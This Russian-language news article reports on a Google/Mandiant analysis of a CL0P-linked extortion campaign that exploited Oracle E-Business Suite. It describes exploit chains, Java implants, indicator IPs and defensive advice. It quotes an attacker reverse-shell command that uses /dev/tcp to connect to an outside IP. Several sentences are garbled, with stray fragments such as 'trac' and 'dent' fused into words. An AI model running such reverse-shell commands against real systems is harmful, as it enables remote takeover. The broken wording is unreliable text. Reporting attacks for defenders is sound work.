Компания Google сообщает об использовании «огромного количества данных клиентов» в кампании по вымогательству

Компания Google сообщила о масштабномtracданных клиентов злоумышленниками, которые, по утверждению компании, участвуют в схеме вымогательства. Google Threat Intelligence и Mandiant tracоперацию по взлому до злоумышленников, которые могут быть связаны с группой вымогателей CL0P.

Группа по анализу угроз Google (GTIG) и компания Mandiant выявили масштабную кампанию вымогательства, использующую уязвимости в Oracle E-Business Suite (EBS). В результате этой кампании были украдены большие объемы данных клиентов. По их словам, операция началась 29 сентября 2025 года и в ней участвовала группа, заявляющая о связях с брендом вымогательства CL0P.

Google и Mandiant обнаружили уязвимость нулевого дня 

Согласно отчету Google, злоумышленники разослали «большое количество» электронных писем руководителям различных организаций, утверждая о взломе их сред Oracle EBS и угрожая опубликовать украденные данные, если не будет выплачен выкуп. 

В электронных письмах, отправленных с сотен взломанных сторонних аккаунтов, содержались контактные адреса [email protected] и [email protected], ранее связанные с сайтом утечки данных CL0P.

В ходе совместного расследования Google и Mandiant было установлено, что деятельность по эксплуатации уязвимостей началась еще в июле 2025 года и, возможно, связана с уязвимостью нулевого дня, tracобозначение CVE-2025-61882. В некоторых случаях, как сообщается, злоумышленники похитили «значительный объем данных» из пострадавших организаций.

Компания Oracle заявила, что уязвимости, которыми пользовались злоумышленники, были устранены в июле, но позже, 4 октября, выпустила экстренные обновления для решения дополнительных проблем. Oracle призвала своих клиентов использовать последние критически важные обновления и подчеркнула, что своевременное обновление всех патчей имеет важное значение для предотвращения компрометации.

Бренд вымогательства CL0P существует с 2020 года и исторически связан с киберпреступной группировкой FIN11. Ранее он атаковал системы управляемой передачи файлов, такие как MOVEit, GoAnywhere и Accellion FTA. Эти кампании следовали схожей схеме: массовая эксплуатация уязвимостей нулевого дня, кража конфиденциальных данных и вымогательство спустя несколько недель. 

На момент публикации отчета, новых жертв этого инцидента неdent на сайте CL0P, посвященном утечке данных 

Сложные, многоэтапные Java-имплантаты

Google и Mandiant, показал, что злоумышленники использовали несколько цепочек эксплойтов, нацеленных на компоненты Oracle EBS, включая UiServlet и SyncServlet, для удаленного выполнения кода и внедрения многоступенчатых Java-имплантатов.

В июле 2025 года была зафиксирована подозрительная активность, связанная с HTTP-запросами к /OA_HTML/configurator/UiServlet. Эта подозрительная активность была обнаружена в другом эксплойте, который позже появился в группе Telegram под названием «SCATTERED LAPSUS$ HUNTERS» 

Утекшая в сеть уязвимость использовала несколько сложных методов для получения контроля над целевыми серверами, таких как подделка запросов на стороне сервера (SSRF), обход аутентификации и внедрение шаблона XSL.

К августу 2025 года злоумышленники начали использовать еще один инструмент под названием SyncServlet для создания и запуска вредоносных шаблонов внутри базы данных EBS. Эти шаблоны содержали закодированные в Base64 полезные нагрузки XSL, которые загружали вредоносное ПО на основе Java непосредственно в память. 

Средиdentвредоносных программ были GOLDVEIN.JAVA, загрузчик, который получал полезные нагрузки второго этапа с контролируемых злоумышленником командных серверов, и многоуровневая цепочка под названием SAGE, которая устанавливала постоянные фильтры Java-сервлетов для дальнейшей эксплуатации.

После взлома системы злоумышленники использовали учетную запись EBS «applmgr» для исследования системы, сбора информации о сети и системе, а затем установки дополнительных вредоносных файлов. Злоумышленники также использовали команды оболочки, такие как ip addr, netstat -an и bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

В ходе попыток эксплуатации былиdentIP-адреса 200.107.207.26 и 161.97.99.49, а в качестве серверов управления для полезной нагрузки GOLDVEIN.JAVA были указаны 162.55.17.215:443 и 104.194.11.200:443.

GTIG официально не связывала эту операцию ни с одной известной группой, но кампания имеет сходства с FIN11, киберпреступной группировкой, мотивированной финансовыми выгодами, которая ранее была связана с программой-вымогателем CL0P и крупномасштабными операциями по краже данных. 

Компания Mandiant также отметила, что один из взломанных аккаунтов, использованных для отправки писем с угрозами вымогательства, ранее применялся в атаках, связанных с FIN11.

Пользователям настоятельно рекомендуется с подозрением относиться к таблицам базы данных EBS XDO_TEMPLATES_B и XDO_LOBS, особенно к тем, имена которых начинаются с «TMP» или «DEF», и блокировать внешний интернет-трафик с серверов EBS, чтобы предотвратить дальнейшее вымогательство данных.

Организации также рекомендуют тщательно отслеживать HTTP-запросы к таким конечным точкам, как /OA_HTML/SyncServlet и /OA_HTML/configurator/UiServlet, и анализировать дампы памяти на предмет наличия Java-запросов, находящихся в оперативной памяти.

Google предупредил, что связанные с CL0P группы почти наверняка продолжат направлять свои ресурсы на приобретение уязвимостей нулевого дня.